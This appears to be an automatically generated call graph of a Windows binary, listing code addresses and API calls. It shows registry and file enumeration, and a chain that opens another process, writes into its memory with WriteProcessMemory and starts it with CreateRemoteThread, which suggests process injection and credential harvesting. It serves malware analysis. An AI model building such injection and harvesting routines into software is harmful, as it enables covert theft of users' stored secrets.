6888->6889 6890 407bef memset 6888->6890 6889->6649 8025 411dee RegEnumKeyExA 6890->8025 6892 407c6e RegCloseKey 6892->6889 6894 407c1d 6894->6892 8026 411d68 RegOpenKeyExA 6894->8026 8027 407a93 memset RegQueryValueExA 6894->8027 8040 411dee RegEnumKeyExA 6894->8040 8041 411d68 RegOpenKeyExA 6898->8041 6900 410f25 6901 410f30 memset 6900->6901 6902 411025 6900->6902 8042 411dee RegEnumKeyExA 6901->8042 6902->6654 6904 41101c RegCloseKey 6904->6902 6906 410f7f memset 6907 411d82 RegQueryValueExA 6906->6907 6911 410f5d 6907->6911 6909 411d82 RegQueryValueExA 6909->6911 6911->6904 6911->6906 6911->6909 6912 410ff3 RegCloseKey 6911->6912 8043 411d68 RegOpenKeyExA 6911->8043 8044 410e85 strlen 6911->8044 8046 411dee RegEnumKeyExA 6911->8046 6912->6911 6913->6669 6994 404109 6914->6994 6917 410085 7010 404170 6917->7010 6921 404ce0 FreeLibrary 6922 41009c 6921->6922 6922->6669 6923 40ffbb 6923->6917 6924 41003a WideCharToMultiByte 6923->6924 6925 410061 WideCharToMultiByte 6924->6925 6926 41007a LocalFree 6924->6926 6925->6926 6926->6917 6928 414060 6927->6928 6929 4103fe RegOpenKeyExA 6928->6929 6930 40dcc1 6929->6930 6931 410428 RegOpenKeyExA 6929->6931 6941 410205 6930->6941 6932 410440 RegQueryValueExA 6931->6932 6933 41050f RegCloseKey 6931->6933 6934 410506 RegCloseKey 6932->6934 6935 41046d 6932->6935 6933->6930 6934->6933 6936 404c9d 3 API calls 6935->6936 6937 41047a 6936->6937 6937->6934 6938 4104fd LocalFree 6937->6938 6939 4104bf memcpy memcpy 6937->6939 6938->6934 7013 4100a4 6939->7013 7029 406b3b 6941->7029 6944 404109 5 API calls 6948 41023a 6944->6948 6945 41036e 6946 404170 FreeLibrary 6945->6946 6947 40dcca 6946->6947 6947->6691 6954 410383 6947->6954 6948->6945 6949 410296 memset WideCharToMultiByte 6948->6949 7032 40fd01 memset memset 6948->7032 6949->6948 6950 4102d1 _strnicmp 6949->6950 6950->6948 6952 4102f6 WideCharToMultiByte 6952->6948 6953 410316 WideCharToMultiByte 6952->6953 6953->6948 6955 406b06 GetVersionExA 6954->6955 6957 41038e 6955->6957 6956 4103ed 6956->6691 6957->6956 7033 4028e7 6957->7033 6960 4103ca 7042 404380 memset 6960->7042 6961 4103ba _mbscpy 6961->6960 6964 404380 151 API calls 6964->6956 6966 40ff74 RegCloseKey 6965->6966 6967 40fe9a 6965->6967 6966->6669 6967->6966 6968 40ff18 6967->6968 6969 404c9d 3 API calls 6967->6969 6970 40ff60 6968->6970 7319 4029d9 strlen 6968->7319 6975 40fec1 6969->6975 6970->6966 6972 40ff10 6974 404ce0 FreeLibrary 6972->6974 6973 40ff3e RegQueryValueExA 6973->6970 6974->6968 6975->6972 6976 40fef1 memcpy 6975->6976 6977 40ff07 LocalFree 6975->6977 6976->6977 6977->6972 6979 40fe48 RegCloseKey 6978->6979 6980 40fd6c 6978->6980 6979->6672 6980->6979 6981 404c9d 3 API calls 6980->6981 6985 40fd97 6981->6985 6982 40fdec 6983 404ce0 FreeLibrary 6982->6983 6984 40fdf4 6983->6984 6984->6979 6988 4029d9 strlen 6984->6988 6985->6982 6986 40fde3 LocalFree 6985->6986 6987 40fdc7 memcpy 6985->6987 6986->6982 6987->6986 6989 40fe17 RegQueryValueExA 6988->6989 6989->6979 6990 40fe35 6989->6990 6990->6979 6992 404cf4 6991->6992 6993 404cea FreeLibrary 6991->6993 6992->6695 6993->6992 6995 404170 FreeLibrary 6994->6995 6996 404111 LoadLibraryA 6995->6996 6997 404122 GetProcAddress GetProcAddress GetProcAddress 6996->6997 6998 40416b 6996->6998 6999 404153 6997->6999 6998->6917 7002 404c9d 6998->7002 7000 404170 FreeLibrary 6999->7000 7001 40415d 6999->7001 7000->6998 7001->6998 7003 404ce0 FreeLibrary 7002->7003 7004 404ca5 LoadLibraryA 7003->7004 7005 404cd0 7004->7005 7006 404cb6 GetProcAddress 7004->7006 7007 404cdb 7005->7007 7009 404ce0 FreeLibrary 7005->7009 7006->7005 7008 404cc9 7006->7008 7007->6923 7008->7005 7009->7007 7011 404180 7010->7011 7012 404176 FreeLibrary 7010->7012 7011->6921 7012->7011 7014 414060 7013->7014 7015 4100b1 RegOpenKeyExA 7014->7015 7016 4100d6 memset 7015->7016 7017 4101fe 7015->7017 7018 4101e4 RegEnumKeyA 7016->7018 7017->6938 7019 410103 RegOpenKeyExA 7018->7019 7020 4101f5 RegCloseKey 7018->7020 7021 410125 RegQueryValueExA 7019->7021 7023 41014e 7019->7023 7020->7017 7022 4101cd RegCloseKey 7021->7022 7021->7023 7022->7023 7023->7018 7023->7022 7025 406958 2 API calls 7023->7025 7028 40fd01 memset memset 7023->7028 7026 41019d WideCharToMultiByte 7025->7026 7027 4101c2 LocalFree 7026->7027 7027->7022 7028->7023 7030 406b06 GetVersionExA 7029->7030 7031 406b40 7030->7031 7031->6944 7032->6952 7051 4066e3 7033->7051 7036 402918 7038 4066e3 strncat 7036->7038 7037 40293a 7037->6960 7037->6961 7039 402922 GetProcAddress 7038->7039 7040 402933 FreeLibrary 7039->7040 7041 40292e 7039->7041 7040->7037 7041->7040 7043 41223f 9 API calls 7042->7043 7044 4043b7 7043->7044 7045 40680e 2 API calls 7044->7045 7050 4043da 7044->7050 7046 4043c2 7045->7046 7055 406efe strlen strlen 7046->7055 7050->6964 7052 406712 7051->7052 7053 4066f0 strncat 7052->7053 7054 402901 GetModuleHandleA 7052->7054 7053->7052 7054->7036 7054->7037 7056 4043cc 7055->7056 7057 406f1b _mbscat 7055->7057 7058 4042aa 7056->7058 7057->7056 7072 40783b 7058->7072 7062 40436c 7108 407930 7062->7108 7066 406b3b GetVersionExA 7067 4042ee 7066->7067 7067->7062 7067->7066 7068 4042aa 141 API calls 7067->7068 7069 407898 9 API calls 7067->7069 7070 40430c _strnicmp 7067->7070 7090 404220 7067->7090 7104 407800 7067->7104 7068->7067 7069->7067 7070->7067 7073 407930 FindClose 7072->7073 7074 407846 7073->7074 7075 406958 2 API calls 7074->7075 7076 40785a strlen strlen 7075->7076 7077 407883 7076->7077 7078 4042e3 7076->7078 7079 406b4b 4 API calls 7077->7079 7080 407898 7078->7080 7079->7078 7081 4078a3 FindFirstFileA 7080->7081 7082 4078c4 FindNextFileA 7080->7082 7083 4078df 7081->7083 7084 4078e6 strlen strlen 7082->7084 7085 4078da 7082->7085 7083->7084 7089 40791f 7083->7089 7087 407916 7084->7087 7084->7089 7086 407930 FindClose 7085->7086 7086->7083 7088 406b4b 4 API calls 7087->7088 7088->7089 7089->7067 7111 4067ba CreateFileA 7090->7111 7092 404233 7093 4042a0 7092->7093 7094 40423e GetFileSize 7092->7094 7093->7067 7095 404253 ??2@YAPAXI 7094->7095 7096 404297 CloseHandle 7094->7096 7112 406ed6 ReadFile 7095->7112 7096->7093 7099 404290 ??3@YAXPAX 7099->7096 7100 406b3b GetVersionExA 7101 404275 7100->7101 7114 4049e6 7101->7114 7105 40780a strcmp 7104->7105 7107 407832 7104->7107 7106 407821 strcmp 7105->7106 7105->7107 7106->7107 7107->7067 7109 404377 7108->7109 7110 407939 FindClose 7108->7110 7109->7050 7110->7109 7111->7092 7113 404269 7112->7113 7113->7099 7113->7100 7153 4043e4 memset 7114->7153 7116 4049fc 7117 40428d 7116->7117 7118 404a04 OpenProcess 7116->7118 7117->7099 7118->7117 7119 404a1c memset GetModuleHandleA 7118->7119 7168 411ba1 7119->7168 7122 404a66 GetProcAddress 7123 404a61 7122->7123 7124 411ba1 6 API calls 7123->7124 7125 404a77 7124->7125 7126 404a82 7125->7126 7127 404a87 GetProcAddress 7125->7127 7128 411ba1 6 API calls 7126->7128 7127->7126 7129 404a98 7128->7129 7130 404aa3 7129->7130 7131 404aa8 GetProcAddress 7129->7131 7132 411ba1 6 API calls 7130->7132 7131->7130 7133 404ab9 7132->7133 7134 404ac4 7133->7134 7135 404ac9 GetProcAddress 7133->7135 7136 404acb VirtualAllocEx VirtualAllocEx VirtualAllocEx VirtualAllocEx 7134->7136 7135->7136 7137 404c57 VirtualFreeEx VirtualFreeEx VirtualFreeEx VirtualFreeEx CloseHandle 7136->7137 7138 404b2c 7136->7138 7137->7117 7138->7137 7139 404b46 WriteProcessMemory 7138->7139 7172 40496d _mbscat _mbscpy _mbscpy 7139->7172 7141 404b65 WriteProcessMemory WriteProcessMemory 7173 411fc6 GetVersionExA 7141->7173 7146 404c11 ??2@YAPAXI ReadProcessMemory 7148 404c31 7146->7148 7149 404c42 ??3@YAXPAX 7146->7149 7147 404c49 7147->7137 7150 404c4e FreeLibrary 7147->7150 7195 404915 7148->7195 7149->7147 7150->7137 7154 404436 _mbscpy 7153->7154 7155 404429 GetSystemDirectoryA 7153->7155 7156 40680e 2 API calls 7154->7156 7155->7154 7157 404450 7156->7157 7158 4028e7 4 API calls 7157->7158 7159 404455 7158->7159 7160 406efe 3 API calls 7159->7160 7161 40448f 7160->7161 7203 411147 7161->7203 7165 4044a3 7166 4044cd 7165->7166 7167 4044ac memcpy 7165->7167 7166->7116 7167->7166 7169 411bb3 GetModuleHandleA GetProcAddress 7168->7169 7170 404a50 7168->7170 7169->7170 7171 411be4 GetModuleHandleA GetProcAddress strlen strlen 7169->7171 7170->7122 7170->7123 7171->7170 7172->7141 7174 41206a CreateRemoteThread 7173->7174 7175 411fec 7173->7175 7176 404bac 7174->7176 7296 411f43 7175->7296 7178 4044de 7176->7178 7179 410daa 2 API calls 7178->7179 7181 4044f8 7179->7181 7180 404565 7182 404574 ResumeThread WaitForSingleObject CloseHandle memset ReadProcessMemory 7180->7182 7183 40456b FreeLibrary 7180->7183 7181->7180 7184 410d8a LoadLibraryA 7181->7184 7182->7146 7182->7147 7183->7182 7185 404509 7184->7185 7186 40455a CloseHandle 7185->7186 7187 40450d GetProcAddress 7185->7187 7186->7180 7188 404522 7187->7188 7189 404559 7187->7189 7188->7189 7190 410d8a LoadLibraryA 7188->7190 7189->7186 7191 404537 7190->7191 7192 404550 CloseHandle 7191->7192 7193 40453b GetProcAddress 7191->7193 7192->7189 7193->7192 7194 404549 7193->7194 7194->7192 7196 406b3b GetVersionExA 7195->7196 7197 40491c 7196->7197 7198 404939 7197->7198 7199 404920 7197->7199 7201 404937 7198->7201 7202 404890 15 API calls 7198->7202 7199->7201 7300 404890 7199->7300 7201->7149 7202->7198 7225 406b2a 7203->7225 7206 411150 7228 4110af 7206->7228 7207 411157 7238 41102b 7207->7238 7210 404495 7211 411560 7210->7211 7212 41156d 7211->7212 7213 406b2a GetVersionExA 7212->7213 7214 411575 7213->7214 7216 41158b memset K32EnumProcesses 7214->7216 7217 41161e 7214->7217 7215 411616 7215->7165 7216->7215 7219 4115c7 7216->7219 7217->7215 7221 411650 _mbscpy 7217->7221 7222 411696 CloseHandle 7217->7222 7219->7215 7246 4112d9 7219->7246 7259 411172 7219->7259 7275 41172b 7219->7275 7224 41172b 8 API calls 7221->7224 7222->7215 7224->7217 7226 406b06 GetVersionExA 7225->7226 7227 406b2f 7226->7227 7227->7206 7227->7207 7229 4110bc LoadLibraryA 7228->7229 7230 411145 7228->7230 7229->7230 7231 4110ce GetProcAddress 7229->7231 7230->7210 7232 41112a 7231->7232 7233 4110e6 GetProcAddress 7231->7233 7232->7230 7234 41113e FreeLibrary 7232->7234 7233->7232 7235 4110f7 GetProcAddress 7233->7235 7234->7230 7235->7232 7236 411108 GetProcAddress 7235->7236 7236->7232 7237 411119 GetProcAddress 7236->7237 7237->7232 7239 411034 GetModuleHandleA 7238->7239 7245 4110a2 7238->7245 7240 411046 GetProcAddress 7239->7240 7239->7245 7241 41105e GetProcAddress 7240->7241 7240->7245 7242 41106f GetProcAddress 7241->7242 7241->7245 7243 411080 GetProcAddress 7242->7243 7242->7245 7244 411091 GetProcAddress 7243->7244 7243->7245 7244->7245 7245->7210 7247 406b2a GetVersionExA 7246->7247 7248 4112ea 7247->7248 7249 41133e 7248->7249 7250 4112ee 7248->7250 7280 411255 7249->7280 7252 411350 7250->7252 7253 4112f6 OpenProcess 7250->7253 7252->7219 7253->7252 7254 41130b K32EnumProcessModules 7253->7254 7256 411320 K32GetModuleFileNameExA 7254->7256 7257 411335 FindCloseChangeNotification 7254->7257 7256->7257 7258 411334 7256->7258 7257->7252 7258->7257 7260 411184 strchr 7259->7260 7261 411181 _mbscpy 7259->7261 7260->7261 7262 4111a4 7260->7262 7264 411250 7261->7264 7265 407139 3 API calls 7262->7265 7264->7219 7266 4111b3 7265->7266 7267 4111ba memset 7266->7267 7268 4111fd 7266->7268 7285 406bc3 7267->7285 7270 411202 memset 7268->7270 7271 411247 _mbscpy 7268->7271 7273 406bc3 2 API calls 7270->7273 7271->7264 7272 4111e0 _mbscpy _mbscat 7272->7264 7274 411228 memcpy _mbscat 7273->7274 7274->7264 7288 4116a9 strchr 7275->7288 7278 411743 memcpy 7279 411764 7278->7279 7279->7219 7281 4112b7 7280->7281 7282 411268 7280->7282 7281->7252 7282->7281 7283 4112b0 CloseHandle 7282->7283 7284 4112bc _mbscpy CloseHandle 7282->7284 7283->7281 7284->7281 7286 406bd2 GetWindowsDirectoryA 7285->7286 7287 406be3 _mbscpy 7285->7287 7286->7287 7287->7272 7289 4116c0 7288->7289 7290 4116d2 strchr 7288->7290 7291 4116c4 _strcmpi 7289->7291 7290->7289 7292 4116ec memset 7290->7292 7295 4116cb 7291->7295 7293 406a87 _mbscpy strrchr 7292->7293 7294 411715 _strcmpi 7293->7294 7294->7295 7295->7278 7295->7279 7297 411fc1 7296->7297 7298 411f4e LoadLibraryA 7296->7298 7297->7176 7298->7297 7299 411f63 GetProcAddress 7298->7299 7299->7297 7301 406b3b GetVersionExA 7300->7301 7303 4048a2 7301->7303 7302 40490b 7302->7201 7303->7302 7305 404578 wcslen memset 7303->7305 7306 406b3b GetVersionExA 7305->7306 7312 4045c7 7306->7312 7307 404649 wcschr 7309 40465c _wcsncoll 7307->7309 7307->7312 7308 406b3b GetVersionExA 7308->7312 7309->7312 7310 404c9d LoadLibraryA GetProcAddress FreeLibrary 7310->7312 7311 404824 memcpy 7311->7312 7312->7307 7312->7308 7312->7309 7312->7310 7312->7311 7313 404ce0 FreeLibrary 7312->7313 7314 40487f 7312->7314 7315 4046f1 memcpy wcschr 7312->7315 7316 4047d8 memcpy LocalFree 7312->7316 7313->7312 7314->7302 7317 404720 wcscpy 7315->7317 7318 404732 LocalFree 7315->7318 7316->7312 7317->7318 7318->7312 7320 4029f8 7319->7320 7320->6973 7321->6699 7322->6708 7323->6708 7339 411d68 RegOpenKeyExA 7324->7339 7326 40d7b8 7327 40d7c3 memset 7326->7327 7328 40d92b 7326->7328 7337 40d7f1 7327->7337 7328->6713 7328->6714 7330 40d922 RegCloseKey 7330->7328 7332 40d80f RegQueryValueExA 7333 40d8f9 RegCloseKey 7332->7333 7334 40d839 atoi 7332->7334 7333->7337 7334->7333 7334->7337 7335 40d85a memset 7341 40807d memcpy memcpy 7335->7341 7337->7330 7337->7332 7337->7333 7337->7335 7338 40d88b _mbscpy _mbscpy 7337->7338 7340 411d68 RegOpenKeyExA 7337->7340 7352 411dee RegEnumKeyExA 7337->7352 7338->7337 7339->7326 7340->7337 7342 4080b0 7341->7342 7353 40c929 7342->7353 7344 4080bf 7360 40c9c7 7344->7360 7346 4080cb 7346->7346 7347 40810c memset 7346->7347 7350 408194 7346->7350 7349 408138 7347->7349 7348 40815f strlen 7348->7350 7351 40816b _mbscpy _mbscpy 7348->7351 7349->7348 7350->7337 7351->7350 7352->7337 7354 40c940 7353->7354 7355 40c960 memcpy 7354->7355 7356 40c967 memcpy 7354->7356 7359 40c97e 7354->7359 7355->7344 7356->7359 7357 40c98d memcpy 7357->7359 7359->7355 7359->7357 7361 40c9e1 memset 7360->7361 7362 40ca07 memset 7360->7362 7367 40ca46 7361->7367 7364 40ca16 7362->7364 7366 40ca2c memcpy memset 7364->7366 7365 40c9f7 memset 7365->7364 7366->7346 7367->7365 7369 407dc4 7368->7369 7370 411d68 RegOpenKeyExA 7369->7370 7370->6720 7371->6724 7372->6724 7374 407e51 7373->7374 7375 407f77 RegCloseKey 7374->7375 7376 407e65 memset 7374->7376 7375->6724 7377 407e96 7376->7377 7378 404c9d 3 API calls 7377->7378 7381 407ede 7378->7381 7379 407f6f 7380 404ce0 FreeLibrary 7379->7380 7380->7375 7381->7379 7382 407f25 memcpy 7381->7382 7383 406958 2 API calls 7382->7383 7384 407f59 LocalFree 7383->7384 7384->7379 7386->6724 7387->6740 7405 4067ba CreateFileA 7388->7405 7390 410ad6 7391 410ae3 GetFileSize 7390->7391 7392 410b8e 7390->7392 7406 407a56 7391->7406 7392->6741 7394 410b07 7395 407a56 2 API calls 7394->7395 7396 410b1a 7395->7396 7397 406ed6 ReadFile 7396->7397 7399 410b31 7397->7399 7398 410b75 CloseHandle 7428 407a41 7398->7428 7399->7398 7401 410b50 WideCharToMultiByte 7399->7401 7409 4108fa 7401->7409 7404 407a41 ??3@YAXPAX 7404->7392 7405->7390 7407 407a6a ??2@YAPAXI 7406->7407 7408 407a5c ??3@YAXPAX 7406->7408 7407->7394 7408->7407 7410 410907 7409->7410 7411 404c9d 3 API calls 7410->7411 7412 41091d 7411->7412 7413 410925 memset 7412->7413 7414 410ab6 7412->7414 7431 407193 7413->7431 7415 404ce0 FreeLibrary 7414->7415 7417 410abe 7415->7417 7417->7398 7418 410958 7418->7414 7419 41096b memset 7418->7419 7420 407193 memcpy 7418->7420 7422 4109b8 MultiByteToWideChar 7418->7422 7423 4109e0 memset 7418->7423 7425 40720f 2 API calls 7418->7425 7426 410a51 LocalFree 7418->7426 7427 410a2f memcpy 7418->7427 7435 40720f 7419->7435 7420->7418 7422->7418 7424 4029d9 strlen 7423->7424 7424->7418 7425->7418 7426->7418 7427->7426 7429 407a55 7428->7429 7430 407a47 ??3@YAXPAX 7428->7430 7429->7404 7430->7429 7432 4071aa 7431->7432 7434 4071a6 7431->7434 7433 4071d4 memcpy 7432->7433 7432->7434 7433->7434 7434->7418 7436 407221 7435->7436 7439 407228 7435->7439 7436->7418 7437 407236 strchr 7437->7439 7438 407269 memcpy 7438->7439 7439->7436 7439->7437 7439->7438 7440->6750 7455 4067ba CreateFileA 7441->7455 7443 405af9 7444 405b02 GetFileSize 7443->7444 7445 405b53 7443->7445 7446 405b12 7444->7446 7447 405b4a CloseHandle 7444->7447 7445->6752 7448 407a56 2 API calls 7446->7448 7447->7445 7449 405b23 7448->7449 7450 406ed6 ReadFile 7449->7450 7451 405b32 7450->7451 7456 405865 memset 7451->7456 7454 407a41 ??3@YAXPAX 7454->7447 7455->7443 7457 407193 memcpy 7456->7457 7465 4058c3 7457->7465 7458 405ae1 7458->7454 7459 406958 2 API calls 7459->7465 7460 405902 strlen 7460->7465 7461 40593d memset memset 7461->7465 7462 4070e4 strlen strlen memcmp 7462->7465 7463 407193 memcpy 7463->7465 7465->7458 7465->7459 7465->7460 7465->7461 7465->7462 7465->7463 7466 406d5a strtoul 7465->7466 7466->7465 7468 40f9b6 7467->7468 7516 40fa34 7468->7516 7470 40fa26 7534 40733e ??3@YAXPAX ??3@YAXPAX 7470->7534 7472 40e6a8 strrchr 7472->6757 7475 40f9bc 7475->7470 7476 40fa11 7475->7476 7529 406d2b 7475->7529 7476->7470 7477 406958 2 API calls 7476->7477 7477->7470 7561 410c4c memset 7478->7561 7481 406521 memset 7483 406958 2 API calls 7481->7483 7482 4066d9 7513 410d6f 7482->7513 7484 40654d 7483->7484 7485 40656e memset memset memset strlen strlen 7484->7485 7510 4066c1 7484->7510 7486 4065d5 7485->7486 7487 4065e4 strlen strlen 7485->7487 7489 406b4b 4 API calls 7486->7489 7491 40661d strlen strlen 7487->7491 7492 40660e 7487->7492 7488 410d6f 2 API calls 7488->7482 7489->7487 7495 406647 7491->7495 7496 406656 7491->7496 7493 406b4b 4 API calls 7492->7493 7493->7491 7497 406b4b 4 API calls 7495->7497 7571 4069d3 GetFileAttributesA 7496->7571 7497->7496 7499 40666d 7500 406681 7499->7500 7501 406672 7499->7501 7591 4069d3 GetFileAttributesA 7500->7591 7572 4062db 7501->7572 7504 40668d 7505 4066a1 7504->7505 7506 406692 7504->7506 7592 4069d3 GetFileAttributesA 7505->7592 7507 4062db 21 API calls 7506->7507 7507->7505 7509 4066ad 7509->7510 7511 4066b2 7509->7511 7510->7488 7512 4062db 21 API calls 7511->7512 7512->7510 7514 410d74 SetCurrentDirectoryA FreeLibrary 7513->7514 7515 40e71c 7513->7515 7514->7515 7515->6762 7517 40fa48 7516->7517 7535 40fc4f memset memset 7517->7535 7519 40fb5b 7548 40733e ??3@YAXPAX ??3@YAXPAX 7519->7548 7520 40fa66 memset 7526 40fa4e 7520->7526 7522 40fb63 7522->7475 7523 40fa8a strlen strlen 7523->7526 7524 40faec strlen strlen 7524->7526 7525 406b4b strlen _mbscat _mbscpy _mbscat 7525->7526 7526->7519 7526->7520 7526->7523 7526->7524 7526->7525 7527 4069d3 GetFileAttributesA 7526->7527 7528 407364 7 API calls 7526->7528 7527->7526 7528->7526 7560 4067ba CreateFileA 7529->7560 7531 406d38 7532 406d55 CompareFileTime 7531->7532 7533 406d3f GetFileTime FindCloseChangeNotification 7531->7533 7532->7475 7533->7532 7534->7472 7536 41223f 9 API calls 7535->7536 7537 40fc9e 7536->7537 7538 40680e 2 API calls 7537->7538 7539 40fca5 _mbscat 7538->7539 7540 41223f 9 API calls 7539->7540 7541 40fcc6 7540->7541 7542 40680e 2 API calls 7541->7542 7543 40fccd _mbscat 7542->7543 7549 40fb6a 7543->7549 7546 40fb6a 22 API calls 7547 40fcfa 7546->7547 7547->7526 7548->7522 7550 40783b 9 API calls 7549->7550 7558 40fb9e 7550->7558 7551 40fc3e 7553 407930 FindClose 7551->7553 7552 407800 strcmp strcmp 7552->7558 7554 40fc49 7553->7554 7554->7546 7555 40783b 9 API calls 7555->7558 7556 407898 9 API calls 7556->7558 7557 407930 FindClose 7557->7558 7558->7551 7558->7552 7558->7555 7558->7556 7558->7557 7559 407364 7 API calls 7558->7559 7559->7558 7560->7531 7593 405ec5 memset memset 7561->7593 7564 406519 7564->7481 7564->7482 7565 410c8d GetCurrentDirectoryA SetCurrentDirectoryA memset strlen strlen 7566 410cf3 LoadLibraryExA 7565->7566 7567 410cdc 7565->7567 7566->7564 7570 410d17 6 API calls 7566->7570 7568 406b4b 4 API calls 7567->7568 7568->7566 7570->7564 7571->7499 7573 4062e8 7572->7573 7625 4067ba CreateFileA 7573->7625 7575 4062f3 7576 406302 GetFileSize 7575->7576 7577 4064f4 7575->7577 7578 406316 ??2@YAPAXI 7576->7578 7579 4064eb CloseHandle 7576->7579 7577->7500 7580 406ed6 ReadFile 7578->7580 7579->7577 7581 40632c memset memset memset 7580->7581 7626 4060c4 7581->7626 7583 4064e2 ??3@YAXPAX 7583->7579 7584 4063ad strcmp 7587 406395 7584->7587 7585 4060c4 memcpy 7585->7587 7586 40644e _mbscpy 7586->7587 7587->7583 7587->7584 7587->7585 7587->7586 7588 40645d _mbscpy 7587->7588 7590 4064a7 strcmp 7587->7590 7630 40623f 7588->7630 7590->7587 7591->7504 7592->7509 7615 411d68 RegOpenKeyExA 7593->7615 7595 405f1c 7596 406072 _mbscpy 7595->7596 7597 405f27 memset 7595->7597 7599 406085 ExpandEnvironmentStringsA 7596->7599 7610 4060b0 7596->7610 7622 411dee RegEnumKeyExA 7597->7622 7616 405e4a memset strlen strlen 7599->7616 7602 406069 RegCloseKey 7602->7596 7603 405f5a _mbsnbicmp 7604 405f78 memset memset _snprintf 7603->7604 7612 405f52 7603->7612 7607 411dae 3 API calls 7604->7607 7605 4060a2 GetCurrentDirectoryA 7608 405e4a 8 API calls 7605->7608 7609 405fd9 _mbsrchr 7607->7609 7608->7610 7609->7612 7610->7564 7610->7565 7611 405e4a 8 API calls 7611->7612 7612->7602 7612->7603 7612->7611 7613 406004 _mbsicmp 7612->7613 7623 411dee RegEnumKeyExA 7612->7623 7613->7612 7614 40601d _mbscpy _mbscpy 7613->7614 7614->7612 7615->7595 7617 405e91 7616->7617 7618 405ea0 7616->7618 7619 406b4b 4 API calls 7617->7619 7624 4069d3 GetFileAttributesA 7618->7624 7619->7618 7621 405eb7 7621->7605 7621->7610 7622->7612 7623->7612 7624->7621 7625->7575 7627 4060db 7626->7627 7629 4060d7 7626->7629 7628 406106 memcpy 7627->7628 7627->7629 7628->7629 7629->7587 7631 40624c 7630->7631 7632 406259 _mbscpy 7631->7632 7638 406143 7632->7638 7635 406143 3 API calls 7636 406290 _mbscpy _mbscpy _mbscpy 7635->7636 7637 4062d6 7636->7637 7637->7587 7639 406163 7638->7639 7640 406174 7638->7640 7641 406180 memset 7639->7641 7642 40616c 7639->7642 7640->7635 7644 4029d9 strlen 7641->7644 7643 4029d9 strlen 7642->7643 7643->7640 7645 4061a7 7644->7645 7645->7640 7646 406214 memcpy 7645->7646 7646->7640 7648 4085c6 7647->7648 7676 40733e ??3@YAXPAX ??3@YAXPAX 7648->7676 7650 408602 7677 40821a 7650->7677 7652 4085d3 7652->7650 7700 407407 7652->7700 7656 4086db 7664 40733e ??3@YAXPAX ??3@YAXPAX 7656->7664 7657 4086d3 7658 404d18 7 API calls 7657->7658 7658->7656 7659 408649 MultiByteToWideChar _wcslwr 7705 408490 7659->7705 7662 408610 7662->7656 7662->7657 7662->7659 7663 408490 17 API calls 7662->7663 7663->7662 7664->6769 7666 4081b7 7665->7666 7667 4081ac FreeLibrary 7665->7667 7668 407491 ??3@YAXPAX 7666->7668 7667->7666 7669 4081c0 7668->7669 7743 40733e ??3@YAXPAX ??3@YAXPAX 7669->7743 7671 4081c8 7744 40733e ??3@YAXPAX ??3@YAXPAX 7671->7744 7673 4081d0 7745 40733e ??3@YAXPAX ??3@YAXPAX 7673->7745 7675 4081d8 7676->7652 7719 40733e ??3@YAXPAX ??3@YAXPAX 7677->7719 7679 408233 7720 411d68 RegOpenKeyExA 7679->7720 7681 408246 7682 408251 7681->7682 7683 408356 7681->7683 7684 40746b 4 API calls 7682->7684 7697 404d18 7683->7697 7685 408269 memset 7684->7685 7721 4074aa 7685->7721 7688 40834c RegCloseKey 7688->7683 7689 4082bd 7690 4082c6 _strupr 7689->7690 7691 407364 7 API calls 7690->7691 7692 4082e4 7691->7692 7693 407364 7 API calls 7692->7693 7694 4082f8 memset 7693->7694 7695 4074aa 7694->7695 7696 408327 RegEnumValueA 7695->7696 7696->7688 7696->7690 7698 404d79 7697->7698 7699 404d1d 7 API calls 7697->7699 7698->7662 7699->7698 7723 407428 7700->7723 7703 407424 7703->7652 7704 407364 7 API calls 7704->7703 7706 404d18 7 API calls 7705->7706 7707 4084a6 7706->7707 7708 4085a8 wcslen 7707->7708 7709 4084cb wcslen 7707->7709 7708->7662 7710 404d18 7 API calls 7709->7710 7712 4084e4 7710->7712 7711 40859e 7714 404d18 7 API calls 7711->7714 7712->7711 7713 404d18 7 API calls 7712->7713 7715 40851d 7713->7715 7714->7708 7715->7711 7716 40853a memset 7715->7716 7717 408560 7716->7717 7727 4083d0 7717->7727 7719->7679 7720->7681 7722 4074b0 RegEnumValueA 7721->7722 7722->7688 7722->7689 7724 40742e 7723->7724 7725 407437 strcmp 7724->7725 7726 407413 7724->7726 7725->7724 7725->7726 7726->7703 7726->7704 7728 407428 strcmp 7727->7728 7730 4083e3 7728->7730 7729 40848a 7729->7711 7730->7729 7731 40841f wcslen 7730->7731 7732 404c9d 3 API calls 7731->7732 7735 408447 7732->7735 7733 408482 7734 404ce0 FreeLibrary 7733->7734 7734->7729 7735->7733 7736 408479 LocalFree 7735->7736 7738 40835f 7735->7738 7736->7733 7740 4083c9 7738->7740 7742 408377 7738->7742 7739 408382 wcslen 7739->7740 7741 40839b wcslen 7739->7741 7740->7736 7741->7742 7742->7739 7742->7740 7743->7671 7744->7673 7745->7675 7747 40e506 7746->7747 7748 40e515 7746->7748 7749 406b4b 4 API calls 7747->7749 7754 4069d3 GetFileAttributesA 7748->7754 7749->7748 7751 40e52c 7752 40e540 7751->7752 7755 40e293 7751->7755 7752->6774 7752->6776 7754->7751 7770 4067ba CreateFileA 7755->7770 7757 40e2a7 7758 40e2b4 GetFileSize 7757->7758 7759 40e4ac 7757->7759 7760 40e4a3 CloseHandle 7758->7760 7761 40e2cc ??2@YAPAXI memset ReadFile 7758->7761 7759->7752 7760->7759 7768 40e314 7761->7768 7762 407193 memcpy 7762->7768 7763 40e49c ??3@YAXPAX 7763->7760 7764 407139 strlen strlen _memicmp 7764->7768 7765 40e39b memcpy memcpy 7766 407139 3 API calls 7765->7766 7766->7768 7767 406958 2 API calls 7767->7768 7768->7762 7768->7763 7768->7764 7768->7765 7768->7767 7769 4029d9 strlen 7768->7769 7769->7768 7770->7757 7772 414060 7771->7772 7773 40dd72 memset strlen strlen 7772->7773 7774 40ddbe 7773->7774 7775 40ddad 7773->7775 7785 4069d3 GetFileAttributesA 7774->7785 7776 406b4b 4 API calls 7775->7776 7776->7774 7778 40ddd4 7779 40dddd 7 API calls 7778->7779 7780 40dfcf 7778->7780 7779->7780 7783 40dea4 7779->7783 7780->6784 7782 406958 strlen memcpy 7782->7783 7783->7780 7783->7782 7784 40df4c sprintf GetPrivateProfileStringA GetPrivateProfileStringA 7783->7784 7786 40dcf2 7783->7786 7784->7780 7784->7783 7785->7778 7787 40dd0d 7786->7787 7788 40dd54 7787->7788 7789 40dd1f strtoul 7787->7789 7788->7783 7789->7787 7789->7788 7791 4029d9 strlen 7790->7791 7792 4024a4 7791->7792 7793 4024b7 ??2@YAPAXI ??2@YAPAXI memcpy 7792->7793 7794 4024ac 7792->7794 7795 4025c8 